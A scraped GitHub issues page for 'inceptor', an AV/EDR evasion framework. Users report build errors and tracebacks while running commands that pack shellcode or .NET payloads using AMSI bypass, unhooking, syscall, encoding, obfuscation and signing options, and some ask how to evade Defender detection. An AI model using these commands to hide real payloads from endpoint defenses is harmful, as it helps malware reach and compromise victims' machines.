Template-Driven AV/EDR Evasion Framework
License: Other
Senior Security Noob
Tooling around in my own free time, whenever my beloved kid is not playing with the keyboard. xD
](https://github.com/klezVirus)
Hello @klezVirus ,
thank you for your work. I tried to use LLVM compilation for nice obfuscation, but this command results in the missing DLL files errors:
python inceptor.py native c:\Repos\test1.raw -o test.exe -C llvm
[...]
[*] Phase 4: EXE compilation and Signing
[>] Phase 4.1: Compiling EXE...
Traceback (most recent call last):
File "C:\Repos\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 202, in generate
self.generate_wrapped()
File "C:\Repos\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 241, in generate_wrapped
self.compile_exe(shellcode)
File "C:\Repos\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 159, in compile_exe
raise FileNotFoundError("Error generating EXE")
FileNotFoundError: Error generating EXE
One of the missing libraries attached.
I repeated the installation process multiple times. The error always occurs.
python inceptor.py dotnet -t donut client.exe -o kiwi.exe --sgn --sign --delay 120 -m syscalls
[-] SyscallsModule requires -m dinvoke!
python inceptor.py dotnet -t donut client.exe -o kiwi.exe --sgn --sign --delay 120 -m syscalls -m dinvoke
[-] No template found with given criteria
C:\Users\Administrator\inceptor\inceptor>python inceptor.py native C: test.exe -o 111daa.exe -t loader
[+] Native Artifact Generator Started At 2021-08-15 11:53:22.856704
[] Phase 0: Loading...
[] Phase 1: Converting binary into shellcode
[>] Transformer: Loader
[] Phase 2: Encoding
[] Phase 3: Generating source files using CLASSIC
[>] Phase 3.1: Writing CPP file in .\temp\tmptxs2l2rc.cpp
[*] Phase 4: EXE compilation and Signing
[>] Phase 4.1: Compiling EXE...
Traceback (most recent call last):
File "C:\Users\Administrator\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 202, in generate
self.generate_wrapped()
File "C:\Users\Administrator\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 241, in generate_wrapped
self.compile_exe(shellcode)
File "C:\Users\Administrator\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 156, in compile_exe
status = self.compiler.compile([self.exe_writer.outfile] + self.obj_files)
File "C:\Users\Administrator\inceptor\inceptor\compilers\Compiler.py", line 63, in compile
output = subprocess.check_output(cmd)
File "C:\Users\Administrator\AppData\Local\Programs\Python\Python39\lib\subprocess.py", line 424, in check_output
return run(*popenargs, stdout=PIPE, timeout=timeout, check=True,
File "C:\Users\Administrator\AppData\Local\Programs\Python\Python39\lib\subprocess.py", line 505, in run
with Popen(*popenargs, **kwargs) as process:
File "C:\Users\Administrator\AppData\Local\Programs\Python\Python39\lib\subprocess.py", line 951, in init
self._execute_child(args, executable, preexec_fn, close_fds,
File "C:\Users\Administrator\AppData\Local\Programs\Python\Python39\lib\subprocess.py", line 1420, in _execute_child
hp, ht, pid, tid = _winapi.CreateProcess(executable, args,
PermissionError: [WinError 5] Access is denied
antivirus is disabled
uac is disabled
the administrator rights are
windows server 2019
how can i fix it?
I see that this file is missing in the repository for syscalls, I did add this file to see if that will help but I was wrong assuming this it will show more errors. Maybe it's a specific one that is missing or I can't find.
Thanks!
Not adding file
Adding
PS C:\Users\test\Desktop\inceptor\inceptor> python3 .\inceptor.py
Traceback (most recent call last):
File "C:\Users\test\Desktop\inceptor\inceptor\inceptor.py", line 12, in
from generators.PowerShellArtifactGenerator import PowerShellArtifactGenerator
File "C:\Users\test\Desktop\inceptor\inceptor\generators\PowerShellArtifactGenerator.py", line 9, in
from obfuscators.powershell.Karmaleon import Karmaleon
File "C:\Users\test\Desktop\inceptor\inceptor\obfuscators\powershell\Karmaleon.py", line 6, in
from obfuscators.powershell.chameleon.chameleon import Chameleon
ModuleNotFoundError: No module named 'obfuscators.powershell.chameleon.chameleon'
python3 inceptor.py -hh 1 ⨯
Traceback (most recent call last):
File "/home/kali/Desktop/av bypass/inceptor/inceptor/inceptor.py", line 12, in
from generators.PowerShellArtifactGenerator import PowerShellArtifactGenerator
File "/home/kali/Desktop/av bypass/inceptor/inceptor/generators/PowerShellArtifactGenerator.py", line 9, in
from obfuscators.powershell.Karmaleon import Karmaleon
File "/home/kali/Desktop/av bypass/inceptor/inceptor/obfuscators/powershell/Karmaleon.py", line 6, in
from obfuscators.powershell.chameleon.chameleon import Chameleon
ModuleNotFoundError: No module named 'obfuscators.powershell.chameleon.chameleon'
Hi,
How cloud i hide the running windows?
python inceptor.py dotnet server.exe -o avp.exe -t donut --sgn --sign -m dinvoke
Best regards
Exe.
pip install generators
Requirement already satisfied: generators in c:\users\xxx\inceptor\venv\lib\site-packages (2020.4.27)
Requirement already satisfied: strict-functions in c:\users\xxxx\inceptor\venv\lib\site-packages (from generators) (2020.2.4)
File "c:\Users\xxxx\inceptor\inceptor\inceptor.py", line 11, in
from generators.DotNetArtifactGenerator import DotNetArtifactGenerator
ModuleNotFoundError: No module named 'generators.DotNetArtifactGenerator'
Any idea?
Describe the bug
[-] Error: clang-cl: error: no such file or directory: '/SUBSYSTEM:WINDOWS'
I see that the error goes away when not using -hw
Not really sure why that is the case. Tried with adding the -Xlinker option before that but still same error.
Tried with changing the order of the parameter in the cmdline but that did not matter.
To Reproduce
python inceptor.py native in.exe -o out.exe -hw -t donut --delay 30i viewed 3 modes for run dotnet
assembly
classic
service
how to use assembly load or service? have any tutorial about i can use it?
edit:
Windows defender updated and detecting donut stubs, i need use new codes in csharp to stay away from detections, if i try use old stubs (like old rat's and more) the AV detect fast in runtime execution
Hello everyone, I continue to receive the following error.
[>] Transformer: Donut Traceback (most recent call last): File "C:\Users\username\Downloads\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 249, in generate self.generate_wrapped() File "C:\Users\username\Downloads\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 271, in generate_wrapped shellcode_bytes = self.transformer.transform(target=self.file) File "C:\Users\username\Downloads\inceptor\inceptor\converters\Donut.py", line 31, in transform raise ArchitectureMismatch( converters.Donut.ArchitectureMismatch: The target binary is x86, while donut is running as x64
If I compile the program with x64. everything goes ok.
But if the command is in x86, I receive this error.
Can you help me
Describe the bug
Compilation error when using native-map_view_section.cpp with native executable
The error is the following:
[-] Error: C:\PATH\inceptor\temp\tmpp_gn47jr.cpp(128,32): error: non-constant-expression cannot be narrowed from type 'SIZE_T' (aka 'unsigned long long') to 'DWORD' (aka 'unsigned long') in initializer list [-Wc++11-narrowing]
To Reproduce
python3.exe .\inceptor.py native -P -P0 process
Tried to add the -Wnoc++11-narrowing option but still no luck.
Thanks in advance
Traceback (most recent call last):
File "C:\Users\Mushroom\Desktop\inceptor-main\inceptor\generators\NativeArtifactGenerator.py", line 249, in generate
self.generate_wrapped()
File "C:\Users\Mushroom\Desktop\inceptor-main\inceptor\generators\NativeArtifactGenerator.py", line 292, in generate_wrapped
self.compile_exe(shellcode)
File "C:\Users\Mushroom\Desktop\inceptor-main\inceptor\generators\NativeArtifactGenerator.py", line 201, in compile_exe
status = self.compiler.compile([self.exe_writer.outfile] + self.obj_files)
File "C:\Users\Mushroom\Desktop\inceptor-main\inceptor\compilers\Compiler.py", line 66, in compile
output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
File "C:\Users\Mushroom\AppData\Local\Programs\Python\Python39\lib\subprocess.py", line 424, in check_output
return run(*popenargs, stdout=PIPE, timeout=timeout, check=True,
File "C:\Users\Mushroom\AppData\Local\Programs\Python\Python39\lib\subprocess.py", line 505, in run
with Popen(*popenargs, **kwargs) as process:
File "C:\Users\Mushroom\AppData\Local\Programs\Python\Python39\lib\subprocess.py", line 951, in init
self._execute_child(args, executable, preexec_fn, close_fds,
File "C:\Users\Mushroom\AppData\Local\Programs\Python\Python39\lib\subprocess.py", line 1420, in _execute_child
hp, ht, pid, tid = _winapi.CreateProcess(executable, args,
PermissionError: [WinError 5] Acesso negado
Describe the bug
I am trying to build using a provided example for syscalls and unhooking. Inceptor errors that "No template found with given criteria".
To Reproduce
Steps to reproduce the behavior (at least the command line used):
python inceptor.py native -m unhook -m syscalls C:\path\test.raw -o C:\path\inceptor_x64.exeThe .exe will build if I specify -P for process injection templates, but the produced .exe errors out with:
[-] Missing PID... Finding... [-] Process not found
Expected behavior
Expect the syscalls and unhook exe to be built and run, do i need to specify a template?
Screenshots
If applicable, add screenshots to help explain your problem.
Debug Info:
Complete! Files written to:
C:\Users\Administrator\Desktop\inceptor\inceptor\temp\tmpjilv_sh1.h
C:\Users\Administrator\Desktop\inceptor\inceptor\temp\tmpjilv_sh1.c
C:\Users\Administrator\Desktop\inceptor\inceptor\temp\tmpjilv_sh1_.asm
[-] Compiler: File C:\Users\Administrator\Desktop\inceptor\inceptor\temp\tmpjilv_sh1.asm not found
"C:\Program Files (x86)\Microsoft Visual Studio\2019\BuildTools\VC\Tools\MSVC\14.29.30133\bin\Hostx64\x64\ml64.exe" /c /nologo /Zi /Fo"C:\Users\Administrator\Desktop\inceptor\inceptor\temp\tmpjilv_sh1.0.obj" /W3 /errorReport:prompt /Ta
[-] Error: MASM : fatal error A1023:command-line option requires an argument : /Ta
Traceback (most recent call last):
File "C:\Users\Administrator\Desktop\inceptor\inceptor\compilers\Compiler.py", line 66, in compile
output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
File "C:\Users\user\AppData\Local\Programs\Python\Python39\lib\subprocess.py", line 424, in check_output
return run(*popenargs, stdout=PIPE, timeout=timeout, check=True,
File "C:\Users\user\AppData\Local\Programs\Python\Python39\lib\subprocess.py", line 528, in run
raise CalledProcessError(retcode, process.args,
subprocess.CalledProcessError: Command '"C:\Program Files (x86)\Microsoft Visual Studio\2019\BuildTools\VC\Tools\MSVC\14.29.30133\bin\Hostx64\x64\ml64.exe" /c /nologo /Zi /Fo"C:\Users\Administrator\Desktop\inceptor\inceptor\temp\tmpjilv_sh1.0.obj" /W3 /errorReport:prompt /Ta ' returned non-zero exit status 1.
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "C:\Users\Administrator\Desktop\inceptor\inceptor\engine\modules\TemplateModule.py", line 84, in from_name
_instance = _class(kwargs=kwargs['kwargs'])
File "C:\Users\Administrator\Desktop\inceptor\inceptor\engine\modules\SyscallsModule.py", line 46, in __init__
self.build(kwargs=kwargs)
File "C:\Users\Administrator\Desktop\inceptor\inceptor\engine\modules\SyscallsModule.py", line 84, in build
masm.compile([f"{syscalls_basepath}.asm"])
File "C:\Users\Administrator\Desktop\inceptor\inceptor\compilers\Compiler.py", line 73, in compile
raise Exception("Compiler Error")
Exception: Compiler Error
[-] No template found with given criteria
Additional context
Add any other context about the problem here.
Hello, I am sure it is something simple I am doing wrong but I keep getting:
Please make sure you have the correct access rights
and the repository exists.
Any ideas of how to sort please?
Thanks!
Describe the bug
zlib module should work
To Reproduce
python3 .\chain-validate.py -l cs -e zlib
Expected behavior
Working
Output
[*] Validating encoder chain for CSHARP
Unhandled Exception: System.IO.FileNotFoundException: Could not load file or assembly 'Zlib.Portable, Version=1.11.0.0, Culture=neutral, PublicKeyToken=431cba815f6a8b5b' or one of its dependencies. The system cannot find the file specified.
at Test.ZlibEncoder.Decode(Byte[] data)
at Test.Test.Main(String[] args)
[-] Failed to execute test
python3 inceptor.py dotnet -t donut -o TEST.exe SHELL.raw
I am trying to execute this command and gives me the error above.
Bug Description
LLVM Compiler wont work.
To Reproduce
python.exe inceptor.py native tests\main.exe -o artifacts\main-36.exe -C llvmWhat it looks like
[+] Native Artifact Generator Started At 2023-10-10 14:20:58.232656
[] Phase 0: Loading...
[] Phase 1: Converting binary into shellcode
[>] Transformer: Pe2sh
[] Phase 2: Encoding
[] Phase 3: Generating source files using CLASSIC
[>] Phase 3.1: Writing CPP file in .\temp\tmp0vyzc7fu.cpp
[*] Phase 4: EXE compilation and Signing
[>] Phase 4.1: Compiling EXE...
[-] Error: C:\Program Files\Microsoft Visual Studio\2022\Preview\VC\Tools\MSVC\14.38.33030\include\utility(229,9): error: expected member name or ';' after declaration specifiers
Traceback (most recent call last):
File "C:\x\Projects\Program\MALWARE\inceptor\inceptor\compilers\Compiler.py", line 66, in compile
output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
File "C:\Users\x\AppData\Local\Programs\Python\Python310\lib\subprocess.py", line 421, in check_output
return run(*popenargs, stdout=PIPE, timeout=timeout, check=True,
File "C:\Users\x\AppData\Local\Programs\Python\Python310\lib\subprocess.py", line 526, in run
raise CalledProcessError(retcode, process.args,
subprocess.CalledProcessError: Command '"C:\Program Files\Microsoft Visual Studio\2022\Preview\VC\Auxiliary\Build\vcvarsall.bat" x64 & "C:\x\Projects\Program\MALWARE\inceptor\inceptor\obfuscators\native\llvm-clang\llvm-clang\clang-cl.exe" /permissive- /GS /GL /W3 /Gy /Zi /Gm- /O2 /sdl /Zc:inline /Zc:wchar_t /fp:precise /D "NDEBUG" /D "_CONSOLE" /D "_UNICODE" /D "UNICODE" /errorReport:prompt /WX- /Zc:forScope /Gd /Oi /MD /FC /EHsc /nologo /diagnostics:column -o "C:\x\Projects\Program\MALWARE\inceptor\inceptor\temp\main-36-temp.exe" /D CUDACC /D _ALLOW_COMPILER_AND_STL_VERSION_MISMATCH -mllvm -bcf -mllvm -bcf_prob=73 -mllvm -bcf_loop=1 -mllvm -sub -mllvm -sub_loop=5 -mllvm -fla -mllvm -split_num=5 -mllvm -aesSeed=4ed3ee74122b15cb57ea400b35317328 -w "C:\x\Projects\Program\MALWARE\inceptor\inceptor\temp\tmp0vyzc7fu.cpp" /link ' returned non-zero exit status 1.
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "C:\x\Projects\Program\MALWARE\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 248, in generate
self.generate_wrapped()
File "C:\x\Projects\Program\MALWARE\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 291, in generate_wrapped
self.compile_exe(shellcode)
File "C:\x\Projects\Program\MALWARE\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 200, in compile_exe
status = self.compiler.compile([self.exe_writer.outfile] + self.obj_files)
File "C:\x\Projects\Program\MALWARE\inceptor\inceptor\compilers\Compiler.py", line 73, in compile
raise Exception("Compiler Error")
Exception: Compiler Error
Debug Info:
[+] Native Artifact Generator Started At 2023-10-10 14:21:44.918387
[] Phase 0: Loading...
[] Phase 1: Converting binary into shellcode
[>] Transformer: Pe2sh
[>] Pe2Sh cmd line: "C:\x\Projects\Program\MALWARE\inceptor\inceptor\libs\public\pe2sh.exe" "C:\x\Projects\Program\MALWARE\inceptor\inceptor\tests\main.exe" "C:\x\Projects\Program\MALWARE\inceptor\inceptor\temp\main.shc.exe"
Reading module from: C:\x\Projects\Program\MALWARE\inceptor\inceptor\tests\main.exe
[+] Saved as: C:\x\Projects\Program\MALWARE\inceptor\inceptor\temp\main.shc.exe
[] Phase 2: Encoding
[] Phase 3: Generating source files using CLASSIC
[>] Phase 3.1: Writing CPP file in .\temp\tmp1na_byjv.cpp
[*] Phase 4: EXE compilation and Signing
[>] Phase 4.1: Compiling EXE...
"C:\Program Files\Microsoft Visual Studio\2022\Preview\VC\Auxiliary\Build\vcvarsall.bat" x64 & "C:\x\Projects\Program\MALWARE\inceptor\inceptor\obfuscators\native\llvm-clang\llvm-clang\clang-cl.exe" /permissive- /GS /GL /W3 /Gy /Zi /Gm- /O2 /sdl /Zc:inline /Zc:wchar_t /fp:precise /D "NDEBUG" /D "_CONSOLE" /D "_UNICODE" /D "UNICODE" /errorReport:prompt /WX- /Zc:forScope /Gd /Oi /MD /FC /EHsc /nologo /diagnostics:column -o "C:\x\Projects\Program\MALWARE\inceptor\inceptor\temp\main-36-temp.exe" /D CUDACC /D _ALLOW_COMPILER_AND_STL_VERSION_MISMATCH -mllvm -bcf -mllvm -bcf_prob=73 -mllvm -bcf_loop=1 -mllvm -sub -mllvm -sub_loop=5 -mllvm -fla -mllvm -split_num=5 -mllvm -aesSeed=83d75223ea0fa0097840d9ecce185f0f -w "C:\x\Projects\Program\MALWARE\inceptor\inceptor\temp\tmp1na_byjv.cpp" /link
[-] Error: C:\Program Files\Microsoft Visual Studio\2022\Preview\VC\Tools\MSVC\14.38.33030\include\utility(229,9): error: expected member name or ';' after declaration specifiers
Traceback (most recent call last):
File "C:\x\Projects\Program\MALWARE\inceptor\inceptor\compilers\Compiler.py", line 66, in compile
output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
File "C:\Users\x\AppData\Local\Programs\Python\Python310\lib\subprocess.py", line 421, in check_output
return run(*popenargs, stdout=PIPE, timeout=timeout, check=True,
File "C:\Users\x\AppData\Local\Programs\Python\Python310\lib\subprocess.py", line 526, in run
raise CalledProcessError(retcode, process.args,
subprocess.CalledProcessError: Command '"C:\Program Files\Microsoft Visual Studio\2022\Preview\VC\Auxiliary\Build\vcvarsall.bat" x64 & "C:\x\Projects\Program\MALWARE\inceptor\inceptor\obfuscators\native\llvm-clang\llvm-clang\clang-cl.exe" /permissive- /GS /GL /W3 /Gy /Zi /Gm- /O2 /sdl /Zc:inline /Zc:wchar_t /fp:precise /D "NDEBUG" /D "_CONSOLE" /D "_UNICODE" /D "UNICODE" /errorReport:prompt /WX- /Zc:forScope /Gd /Oi /MD /FC /EHsc /nologo /diagnostics:column -o "C:\x\Projects\Program\MALWARE\inceptor\inceptor\temp\main-36-temp.exe" /D CUDACC /D _ALLOW_COMPILER_AND_STL_VERSION_MISMATCH -mllvm -bcf -mllvm -bcf_prob=73 -mllvm -bcf_loop=1 -mllvm -sub -mllvm -sub_loop=5 -mllvm -fla -mllvm -split_num=5 -mllvm -aesSeed=83d75223ea0fa0097840d9ecce185f0f -w "C:\x\Projects\Program\MALWARE\inceptor\inceptor\temp\tmp1na_byjv.cpp" /link ' returned non-zero exit status 1.
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "C:\x\Projects\Program\MALWARE\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 248, in generate
self.generate_wrapped()
File "C:\x\Projects\Program\MALWARE\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 291, in generate_wrapped
self.compile_exe(shellcode)
File "C:\x\Projects\Program\MALWARE\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 200, in compile_exe
status = self.compiler.compile([self.exe_writer.outfile] + self.obj_files)
File "C:\x\Projects\Program\MALWARE\inceptor\inceptor\compilers\Compiler.py", line 73, in compile
raise Exception("Compiler Error")
Exception: Compiler Error
python inceptor.py dotnet -t donut client.exe -o kiwi.exe --sgn --sign --delay 120 -m dinvoke -m amsi
[*] Multiple compatible templates identified, choose one:
0: bypass-dinvoke.cs
1: bypass-dinvoke_manual_mapping.cs
$> 0
Traceback (most recent call last):
File "C:\Users\LENOVO\Documents\NoteMalware\inceptor\inceptor\engine\modules\AmsiModule.py", line 62, in init
kwargs["template"] = self.generate(kwargs=kwargs)
File "C:\Users\LENOVO\Documents\NoteMalware\inceptor\inceptor\engine\modules\AmsiModule.py", line 99, in generate
template.process_modules()
File "C:\Users\LENOVO\Documents\NoteMalware\inceptor\inceptor\engine\Template.py", line 76, in process_modules
self.libraries += module.libraries
AttributeError: 'NoneType' object has no attribute 'libraries'
[-] Exception building AmsiModule
I am wondering, how can i use multiple encoders while compiling native stub with pe2sh?
python inceptor.py native -t pe2sh -C llvm -o output.exe -m unhook -e Xor -hw input.exe
-e Xor doesn't affect my stub.
Hello,
I would like to pack my EXE to EXE with dotnet, but I always have this issue when I am trying, what could be the problem here ?
Thank you for your work
Hey @klezVirus,
sorry to bother you again, but I have a few questions/issues. When you have a moment, can you have a look, please?
a) Are you sure the native signatures work correctly?
python inceptor.py native c:\Repos\test1.raw -o test.exe --sign
[+] Native Artifact Generator Started At 2021-09-20 20:31:07.434885
[*] Phase 0: Loading...
[*] Phase 1: Converting binary into shellcode
[>] Transformer: Loader
[*] Phase 2: Encoding
[*] Phase 3: Generating source files using CLASSIC
[>] Phase 3.1: Writing CPP file in .\temp\tmp7egn3rv_.cpp
[*] Phase 4: EXE compilation and Signing
[>] Phase 4.1: Compiling EXE...
[+] Success: file stored at test.exe
[+] Shellcode Signature: e9713d767ff7d57f03556df14db534012d712e38
[>] Phase 4.2: Signing native binary
[*] Phase 5: Finalising
[>] Phase 5.1: Finalising native binary
[+] Success: file stored at test.exe
[*] Phase 6: Cleaning up...
[+] Native Artifact Generator Finished At 2021-09-20 20:31:15.653622
signtool verify /v .\test.exe
Verifying: .\test.exe
SignTool Error: No signature found.
b) Are you sure Modules work correctly in the native mode? I can't see any difference in the below tool output:
python inceptor.py native c:\Repos\test1.raw -o test.exe --modules aaa
[+] Native Artifact Generator Started At 2021-09-20 20:33:20.200979
[*] Phase 0: Loading...
[*] Phase 1: Converting binary into shellcode
[>] Transformer: Loader
[*] Phase 2: Encoding
[*] Phase 3: Generating source files using CLASSIC
[>] Phase 3.1: Writing CPP file in .\temp\tmpao90o50p.cpp
[*] Phase 4: EXE compilation and Signing
[>] Phase 4.1: Compiling EXE...
[+] Success: file stored at test.exe
[+] Shellcode Signature: e9713d767ff7d57f03556df14db534012d712e38
[*] Phase 5: Finalising
[>] Phase 5.1: Finalising native binary
[+] Success: file stored at test.exe
[*] Phase 6: Cleaning up...
[+] Native Artifact Generator Finished At 2021-09-20 20:33:28.389986
python inceptor.py native c:\Repos\test1.raw -o test.exe --modules unhook
[+] Native Artifact Generator Started At 2021-09-20 20:33:37.310321
[*] Phase 0: Loading...
[*] Phase 1: Converting binary into shellcode
[>] Transformer: Loader
[*] Phase 2: Encoding
[*] Phase 3: Generating source files using CLASSIC
[>] Phase 3.1: Writing CPP file in .\temp\tmpsgpu8ejh.cpp
[*] Phase 4: EXE compilation and Signing
[>] Phase 4.1: Compiling EXE...
[+] Success: file stored at test.exe
[+] Shellcode Signature: e9713d767ff7d57f03556df14db534012d712e38
[*] Phase 5: Finalising
[>] Phase 5.1: Finalising native binary
[+] Success: file stored at test.exe
[*] Phase 6: Cleaning up...
[+] Native Artifact Generator Finished At 2021-09-20 20:33:45.294281
c) DLLs - Could you explain how this functionality works with some examples, please? After using the below command, the DLL does not have any exported function, which can be called... so I am not sure whether this worked correctly.
python inceptor.py native c:\Repos\test1.raw -o test.dll --dll --exports testfunction
[+] Native Artifact Generator Started At 2021-09-20 20:41:32.664229
[*] Phase 0: Loading...
[*] Phase 1: Converting binary into shellcode
[>] Transformer: Loader
[*] Phase 2: Encoding
[*] Phase 3: Generating source files using CLASSIC.DLL
[>] Phase 3.1: Writing CPP file in .\temp\tmp13vzis0a.cpp
[*] Phase 4: DLL compilation and Signing
[>] Phase 4.1: Compiling DLL...
[+] Success: file stored at C:\Repos\inceptor\inceptor\temp\test-temp.dll
[*] Phase 5: Finalising
[>] Phase 5.1: Finalising native library
[+] Success: file stored at test.dll
[*] Phase 6: Cleaning up...
[+] Native Artifact Generator Finished At 2021-09-20 20:41:35.757092
dumpbin /exports test.dll
Microsoft (R) COFF/PE Dumper Version 14.29.30133.0
Copyright (C) Microsoft Corporation. All rights reserved.
Dump of file test.dll
File Type: DLL
Summary
1000 .data
1000 .pdata
1000 .rdata
1000 .reloc
2000 .text
Thank you for your time!
Describe the bug
Keep getting no template found even after trying to bruteforce combinations to get it to work.
python inceptor.py native beacon64.raw -C llvm -m syscalls -o incepted.exe
To Reproduce
python inceptor.py native beacon64.raw -C llvm -m syscalls -o incepted.exe
[-] No template found with given criteria
Expected behavior
Payload to be generated
C:\Users\Simon>git clone --recursive https://github.com/klezVirus/inceptor.git
Cloning into 'inceptor'...
remote: Enumerating objects: 607, done.
remote: Counting objects: 100% (607/607), done.
remote: Compressing objects: 100% (359/359), done.
remote: Total 607 (delta 287), reused 548 (delta 228), pack-reused 0 eceiving objects: 94% (571/607), 18.96 MiB | 1.80 Receiving objects: 100% (607/607), 19.27 MiB | 1.55 MiB/s, done.
Resolving deltas: 100% (287/287), done.
Submodule 'inceptor/obfuscators/powershell/chameleon' ([email protected]:klezVirus/chameleon.git) registered for path 'inceptor/obfuscators/powershell/chameleon'
Cloning into 'C:/Users/Simon/inceptor/inceptor/obfuscators/powershell/chameleon'...
Host key verification failed.
fatal: Could not read from remote repository.
Please make sure you have the correct access rights
and the repository exists.
fatal: clone of '[email protected]:klezVirus/chameleon.git' into submodule path 'C:/Users/Simon/inceptor/inceptor/obfuscators/powershell/chameleon' failed
Failed to clone 'inceptor/obfuscators/powershell/chameleon'. Retry scheduled
Cloning into 'C:/Users/Simon/inceptor/inceptor/obfuscators/powershell/chameleon'...
Host key verification failed.
fatal: Could not read from remote repository.
Please make sure you have the correct access rights
and the repository exists.
fatal: clone of '[email protected]:klezVirus/chameleon.git' into submodule path 'C:/Users/Simon/inceptor/inceptor/obfuscators/powershell/chameleon' failed
Failed to clone 'inceptor/obfuscators/powershell/chameleon' a second time, aborting
[ERROR] Module etw was not found
[*] Multiple compatible templates identified, choose one:
0: assembly_load.cs
1: classic.cs
2: service.cs
$>
Describe the bug
dotnet executable
When compiling the cs files needed for the encoders, the CSC compiler complains and stops the process.
[-] Error: temp\tmpg84fw_q7.cs(26,16777214): error CS1034: Compiler limit exceeded: Line cannot exceed 16777214 characters
To Reproduce
This happens when passing a binary (in my case ~4MB) into inceptor.
Expected behavior
working
notes
I think that it might be because the cs file creation process includes the encoded binary into the bytearray in one single line. It might be enough to split the bytearray on more lines? (I am not a C# developer)
Take the opportunity to congratulate all the devs for the amazing work, this tool is awesome.
first of all thank you very much for sharing
C:\Users\LENOVO\Documents\NoteMalware>git clone --recurse https://github.com/klezVirus/inceptor.git
Cloning into 'inceptor'...
remote: Enumerating objects: 272, done.
remote: Counting objects: 100% (272/272), done.
remote: Compressing objects: 100% (203/203), done.
remote: Total 272 (delta 56), reused 272 (delta 56), pack-reused 0
Receiving objects: 100% (272/272), 15.58 MiB | 2.37 MiB/s, done.
Resolving deltas: 100% (56/56), done.
Submodule 'inceptor/obfuscators/powershell/chameleon' ([email protected]:klezVirus/chameleon.git) registered for path 'inceptor/obfuscators/powershell/chameleon'
Cloning into 'C:/Users/LENOVO/Documents/NoteMalware/inceptor/inceptor/obfuscators/powershell/chameleon'...
Host key verification failed.
fatal: Could not read from remote repository.
Please make sure you have the correct access rights
and the repository exists.
fatal: clone of '[email protected]:klezVirus/chameleon.git' into submodule path 'C:/Users/LENOVO/Documents/NoteMalware/inceptor/inceptor/obfuscators/powershell/chameleon' failed
Failed to clone 'inceptor/obfuscators/powershell/chameleon'. Retry scheduled
Cloning into 'C:/Users/LENOVO/Documents/NoteMalware/inceptor/inceptor/obfuscators/powershell/chameleon'...
Host key verification failed.
fatal: Could not read from remote repository.
Please make sure you have the correct access rights
and the repository exists.
fatal: clone of '[email protected]:klezVirus/chameleon.git' into submodule path 'C:/Users/LENOVO/Documents/NoteMalware/inceptor/inceptor/obfuscators/powershell/chameleon' failed
Failed to clone 'inceptor/obfuscators/powershell/chameleon' a second time, aborting
try to fix it by cloning and downloading the repositories manually, but then this problem causes the build to fail
First of all thanks for such an incredible work, I am testing some modules , there is an error in the obfuscating part, greetings
[] Multiple compatible templates identified, choose one:
0: assembly_load.cs
1: classic.cs
$> 1
[+] .Net Artifact Generator Started At 2021-08-03 20:47:24.632763
[] Phase 0: Loading...
[] Phase 1: Converting binary into shellcode
[>] Transformer: Donut
[] Phase 2: Encoding
[>] Phase 2.1: Using Shikata-Ga-Nai x64 to encode the shellcode
[] Encoded filename: C:\Users\LENOVO\Documents\NoteMalware\inceptor\inceptor\temp\tmp4kwjc6t_.raw.sgn
[>] Phase 2.2: Using Inceptor chained encoder to encode the shellcode
[>] Encoder Chain: HexEncoder
[>] Shellcode size: 111282
[>] Shellcode Signature: da5bd58bc1938f68afc1895744dc763b9af944ca
[] Phase 3: Generating source files using CLASSIC
[>] Phase 3.1: Writing CS file in .\temp\tmp00jwrseu.cs
[] Phase 4: Compiling
[] Phase 5: Obfuscate dotnet binary
[#] Multiple obfuscators identified, choose one:
0: AsStrongAsFuck
1: ConfuserEx
2: LoGIC_NET
$> 1
Traceback (most recent call last):
File "C:\Users\LENOVO\Documents\NoteMalware\inceptor\inceptor\obfuscators\Obfuscator.py", line 42, in from_name
obfuscator_instance = obfuscator_class(kwargs=kwargs['kwargs'])
File "C:\Users\LENOVO\Documents\NoteMalware\inceptor\inceptor\obfuscators\dotnet\ConfuserEx.py", line 29, in init
raise FileNotFoundError(f"[-] Missing {self.name} obfuscator utility file")
FileNotFoundError: [-] Missing ConfuserEx obfuscator utility file
Traceback (most recent call last):
File "C:\Users\LENOVO\Documents\NoteMalware\inceptor\inceptor\generators\DotNetArtifactGenerator.py", line 219, in generate
self.generate_wrapped()
File "C:\Users\LENOVO\Documents\NoteMalware\inceptor\inceptor\generators\DotNetArtifactGenerator.py", line 277, in generate_wrapped
self.obfuscate_exe()
File "C:\Users\LENOVO\Documents\NoteMalware\inceptor\inceptor\generators\DotNetArtifactGenerator.py", line 149, in obfuscate_exe
new_file = obfuscator.obfuscate()
AttributeError: 'NoneType' object has no attribute 'obfuscate'
Running into Permission errors with native payloads! when try it either from raw shellcode or exe getting permission error! when i do it from msfvenom .dotnet payload all works fine!!
output from.terminal
11/24/2021 11:04 AM
temp(venv) C:\Users\Administrator\inceptor\inceptor>python inceptor.py native atlsd.
raw -o atlas_packed.exe
[-] Error reading input file
(venv) C:\Users\Administrator\inceptor\inceptor>cd .
(venv) C:\Users\Administrator\inceptor\inceptor>
(venv) C:\Users\Administrator\inceptor\inceptor>cd ..
(venv) C:\Users\Administrator\inceptor>cd inceptor
(venv) C:\Users\Administrator\inceptor\inceptor>ls
'ls' is not recognized as an internal or external command,
operable program or batch file.
(venv) C:\Users\Administrator\inceptor\inceptor>dir
Volume in drive C has no label.
Volume Serial Number is 80C0-C300
Directory of C:\Users\Administrator\inceptor\inceptor
11/24/2021 11:14 AM
.(venv) C:\Users\Administrator\inceptor\inceptor>python inceptor.py native atlas.
